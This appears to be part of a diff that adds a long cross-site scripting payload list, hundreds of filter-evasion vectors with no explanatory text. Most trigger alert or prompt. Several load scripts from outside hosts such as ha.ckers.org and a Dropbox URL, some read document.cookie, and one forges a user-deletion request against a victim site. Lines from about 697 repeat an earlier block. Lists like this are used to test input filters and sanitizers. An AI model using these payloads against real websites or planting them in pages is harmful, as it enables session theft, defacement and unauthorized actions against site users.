+ <script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>
408
+ <script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>
409
+ <script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>
410
+ <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>
411
+ <meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
412
+ <meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
413
+ <meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾
414
+ X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >
415
+ 1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`>
416
+ 1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;>
417
+ <vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe>
418
+ 1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
419
+ <a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a>
420
+ <x style="behavior:url(%(sct)s)">
421
+ <xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label>
422
+ <event-source src="%(event)s" onload="javascript:alert(1)">
423
+ <a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">
424
+ <div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;">
425
+ <script>%(payload)s</script>
426
+ <script src=%(jscript)s></script>
427
+ <script language='javascript' src='%(jscript)s'></script>
428
+ <script>javascript:alert(1)</script>
429
+ <IMG SRC="javascript:javascript:alert(1);">
430
+ <IMG SRC=javascript:javascript:alert(1)>
431
+ <IMG SRC=`javascript:javascript:alert(1)`>
432
+ <SCRIPT SRC=%(jscript)s?<B>
433
+ <FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET>
434
+ <BODY ONLOAD=javascript:alert(1)>
435
+ <BODY ONLOAD=javascript:javascript:alert(1)>
436
+ <IMG SRC="jav ascript:javascript:alert(1);">
437
+ <BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)>
438
+ <SCRIPT/SRC="%(jscript)s"></SCRIPT>
439
+ <<SCRIPT>%(payload)s//<</SCRIPT>
440
+ <IMG SRC="javascript:javascript:alert(1)"
441
+ <iframe src=%(scriptlet)s <
442
+ <INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);">
443
+ <IMG DYNSRC="javascript:javascript:alert(1)">
444
+ <IMG LOWSRC="javascript:javascript:alert(1)">
445
+ <BGSOUND SRC="javascript:javascript:alert(1);">
446
+ <BR SIZE="&{javascript:alert(1)}">
447
+ <LAYER SRC="%(scriptlet)s"></LAYER>
448
+ <LINK REL="stylesheet" HREF="javascript:javascript:alert(1);">
449
+ <STYLE>@import'%(css)s';</STYLE>
450
+ <META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet">
451
+ <XSS STYLE="behavior: url(%(htc)s);">
452
+ <STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS
453
+ <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);">
454
+ <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);">
455
+ <IFRAME SRC="javascript:javascript:alert(1);"></IFRAME>
456
+ <TABLE BACKGROUND="javascript:javascript:alert(1)">
457
+ <TABLE><TD BACKGROUND="javascript:javascript:alert(1)">
458
+ <DIV STYLE="background-image: url(javascript:javascript:alert(1))">
459
+ <DIV STYLE="width:expression(javascript:alert(1));">
460
+ <IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))">
461
+ <XSS STYLE="xss:expression(javascript:alert(1))">
462
+ <STYLE TYPE="text/javascript">javascript:alert(1);</STYLE>
463
+ <STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A>
464
+ <STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE>
465
+ <!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]-->
466
+ <BASE HREF="javascript:javascript:alert(1);//">
467
+ <OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT>
468
+ <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT>
469
+ <HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
470
+ <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;"></BODY></HTML>
471
+ <SCRIPT SRC="%(jpg)s"></SCRIPT>
472
+ <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
473
+ <form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X
474
+ <body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
475
+ <P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)">
476
+ <STYLE>@import'%(css)s';</STYLE>
477
+ <STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE>
478
+ <meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>
479
+ <SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>
480
+ <style onreadystatechange=javascript:javascript:alert(1);></style>
481
+ <?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html>
482
+ <embed code=%(scriptlet)s></embed>
483
+ <embed code=javascript:javascript:alert(1);></embed>
484
+ <embed src=%(jscript)s></embed>
485
+ <frameset onload=javascript:javascript:alert(1)></frameset>
486
+ <object onerror=javascript:javascript:alert(1)>
487
+ <embed type="image" src=%(scriptlet)s></embed>
488
+ <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml>
489
+ <IMG SRC=&{javascript:alert(1);};>
490
+ <a href="jav&#65ascript:javascript:alert(1)">test1</a>
491
+ <a href="jav&#97ascript:javascript:alert(1)">test1</a>
492
+ <embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed>
493
+ <iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1)&amp;gt;>">
494
+ ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
495
+ alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
496
+ ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
497
+ '';!--"<XSS>=&{()}
498
+ <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
499
+ <IMG SRC="javascript:alert('XSS');">
500
+ <IMG SRC=javascript:alert('XSS')>
501
+ <IMG SRC=JaVaScRiPt:alert('XSS')>
502
+ <IMG SRC=javascript:alert("XSS")>
503
+ <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
504
+ <a onmouseover="alert(document.cookie)">xxs link</a>
505
+ <a onmouseover=alert(document.cookie)>xxs link</a>
506
+ <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
507
+ <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
508
+ <IMG SRC=# onmouseover="alert('xxs')">
509
+ <IMG SRC= onmouseover="alert('xxs')">
510
+ <IMG onmouseover="alert('xxs')">
511
+ <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
512
+ <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
513
+ <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
514
+ <IMG SRC="jav ascript:alert('XSS');">
515
+ <IMG SRC="jav&#x09;ascript:alert('XSS');">
516
+ <IMG SRC="jav&#x0A;ascript:alert('XSS');">
517
+ <IMG SRC="jav&#x0D;ascript:alert('XSS');">
518
+ perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
519
+ <IMG SRC=" &#14; javascript:alert('XSS');">
520
+ <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
521
+ <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
522
+ <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
523
+ <<SCRIPT>alert("XSS");//<</SCRIPT>
524
+ <SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
525
+ <SCRIPT SRC=//ha.ckers.org/.j>
526
+ <IMG SRC="javascript:alert('XSS')"
527
+ <iframe src=http://ha.ckers.org/scriptlet.html <
528
+ \";alert('XSS');//
529
+ </TITLE><SCRIPT>alert("XSS");</SCRIPT>
530
+ <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
531
+ <BODY BACKGROUND="javascript:alert('XSS')">
532
+ <IMG DYNSRC="javascript:alert('XSS')">
533
+ <IMG LOWSRC="javascript:alert('XSS')">
534
+ <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
535
+ <IMG SRC='vbscript:msgbox("XSS")'>
536
+ <IMG SRC="livescript:[code]">
537
+ <BODY ONLOAD=alert('XSS')>
538
+ <BGSOUND SRC="javascript:alert('XSS');">
539
+ <BR SIZE="&{alert('XSS')}">
540
+ <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
541
+ <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
542
+ <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
543
+ <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
544
+ <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
545
+ <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
546
+ <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
547
+ exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
548
+ <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
549
+ <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
550
+ <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
551
+ <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
552
+ <XSS STYLE="xss:expression(alert('XSS'))">
553
+ <XSS STYLE="behavior: url(xss.htc);">
554
+ ¼script¾alert(¢XSS¢)¼/script¾
555
+ <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
556
+ <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
557
+ <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
558
+ <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
559
+ <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
560
+ <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
561
+ <TABLE BACKGROUND="javascript:alert('XSS')">
562
+ <TABLE><TD BACKGROUND="javascript:alert('XSS')">
563
+ <DIV STYLE="background-image: url(javascript:alert('XSS'))">
564
+ <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
565
+ <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
566
+ <DIV STYLE="width: expression(alert('XSS'));">
567
+ <BASE HREF="javascript:alert('XSS');//">
568
+ <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
569
+ <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
570
+ <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
571
+ <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
572
+ <? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
573
+ Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
574
+ <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
575
+ <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
576
+ <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
577
+ <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
578
+ <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
579
+ <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
580
+ <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
581
+ <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
582
+ <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
583
+ <A HREF="http://66.102.7.147/">XSS</A>
584
+ <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
585
+ <A HREF="http://1113982867/">XSS</A>
586
+ <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
587
+ <A HREF="http://0102.0146.0007.00000223/">XSS</A>
588
+ <A HREF="htt p://6 6.000146.0x7.147/">XSS</A>
589
+ <iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00>
590
+ <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
591
+ <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
592
+ <sVg><scRipt %00>alert&lpar;1&rpar; {Opera}
593
+ <img/src=`%00` onerror=this.onerror=confirm(1)
594
+ <form><isindex formaction="javascript&colon;confirm(1)"
595
+ <img src=`%00`&NewLine; onerror=alert(1)&NewLine;
596
+ <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
597
+ <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
598
+ <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
599
+ <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
600
+ &#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00
601
+ <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
602
+ <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
603
+ <svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script
604
+ <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
605
+ <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
606
+ <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
607
+ <form><a href="javascript:\u0061lert&#x28;1&#x29;">X
608
+ </script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'>
609
+ <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
610
+ <form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
611
+ <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a
612
+ http://www.google<script .com>alert(document.location)</script
613
+ <a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a
614
+ <img/src=@&#32;&#13; onerror = prompt('&#49;')
615
+ <style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;
616
+ <script ^__^>alert(String.fromCharCode(49))</script ^__^
617
+ </style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(
618
+ &#00;</form><input type&#61;"date" onfocus="alert(1)">
619
+ <form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>
620
+ <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
621
+ <iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>
622
+ <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
623
+ <script ~~~>alert(0%0)</script ~~~>
624
+ <style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>
625
+ <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN
626
+ <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
627
+ &#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'
628
+ &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}
629
+ <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
630
+ <div/style="width:expression(confirm(1))">X</div> {IE7}
631
+ <iframe/%00/ src=javaSCRIPT&colon;alert(1)
632
+ //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//
633
+ /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
634
+ //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
635
+ </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>
636
+ <a/href="javascript:&#13; javascript:prompt(1)"><input type="X">
637
+ </plaintext\></|\><plaintext/onmouseover=prompt(1)
638
+ </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}
639
+ <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
640
+ <div onmouseover='alert&lpar;1&rpar;'>DIV</div>
641
+ <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
642
+ <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
643
+ <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
644
+ <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
645
+ <var onmouseover="prompt(1)">On Mouse Over</var>
646
+ <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
647
+ <img src="/" =_=" title="onerror='prompt(1)'">
648
+ <%<!--'%><script>alert(1);</script -->
649
+ <script src="data:text/javascript,alert(1)"></script>
650
+ <iframe/src \/\/onload = prompt(1)
651
+ <iframe/onreadystatechange=alert(1)
652
+ <svg/onload=alert(1)
653
+ <input value=<><iframe/src=javascript:confirm(1)
654
+ <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
655
+ http://www.<script>alert(1)</script .com
656
+ <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>
657
+ <svg><script ?>alert(1)
658
+ <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
659
+ <img src=`xx:xx`onerror=alert(1)>
660
+ <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
661
+ <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
662
+ <math><a xlink:href="//jsfiddle.net/t846h/">click
663
+ <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
664
+ <svg contentScriptType=text/vbs><script>MsgBox+1
665
+ <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
666
+ <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
667
+ <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
668
+ <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
669
+ <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script
670
+ <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
671
+ <script>+-+-1-+-+alert(1)</script>
672
+ <body/onload=&lt;!--&gt;&#10alert(1)>
673
+ <script itworksinallbrowsers>/*<script* */alert(1)</script
674
+ <img src ?itworksonchrome?\/onerror = alert(1)
675
+ <svg><script>//&NewLine;confirm(1);</script </svg>
676
+ <svg><script onlypossibleinopera:-)> alert(1)
677
+ <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
678
+ <script x> alert(1) </script 1=2
679
+ <div/onmouseover='alert(1)'> style="x:">
680
+ <--`<img/src=` onerror=alert(1)> --!>
681
+ <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
682
+ <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
683
+ "><img src=x onerror=window.open('https://www.google.com/');>
684
+ <form><button formaction=javascript&colon;alert(1)>CLICKME
685
+ <math><a xlink:href="//jsfiddle.net/t846h/">click
686
+ <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
687
+ <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
688
+ <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>
689
+ ‘; alert(1);
690
+ ‘)alert(1);//
691
+ <ScRiPt>alert(1)</sCriPt>
692
+ <IMG SRC=jAVasCrIPt:alert(‘XSS’)>
693
+ <IMG SRC=”javascript:alert(‘XSS’);”>
694
+ <IMG SRC=javascript:alert(&quot;XSS&quot;)>
695
+ <IMG SRC=javascript:alert(‘XSS’)>
696
+ <img src=xss onerror=alert(1)>
697
+ <iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00>
698
+ <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
699
+ <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
700
+ <sVg><scRipt %00>alert&lpar;1&rpar; {Opera}
701
+ <img/src=`%00` onerror=this.onerror=confirm(1)
702
+ <form><isindex formaction="javascript&colon;confirm(1)"
703
+ <img src=`%00`&NewLine; onerror=alert(1)&NewLine;
704
+ <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
705
+ <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
706
+ <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
707
+ <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
708
+ &#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00
709
+ <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
710
+ <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
711
+ <svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script
712
+ <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
713
+ <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
714
+ <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
715
+ <form><a href="javascript:\u0061lert&#x28;1&#x29;">X
716
+ </script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'>
717
+ <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
718
+ <form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
719
+ <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a
720
+ http://www.google<script .com>alert(document.location)</script
721
+ <a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a
722
+ <img/src=@&#32;&#13; onerror = prompt('&#49;')
723
+ <style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;
724
+ <script ^__^>alert(String.fromCharCode(49))</script ^__^
725
+ </style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(
726
+ &#00;</form><input type&#61;"date" onfocus="alert(1)">
727
+ <form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>
728
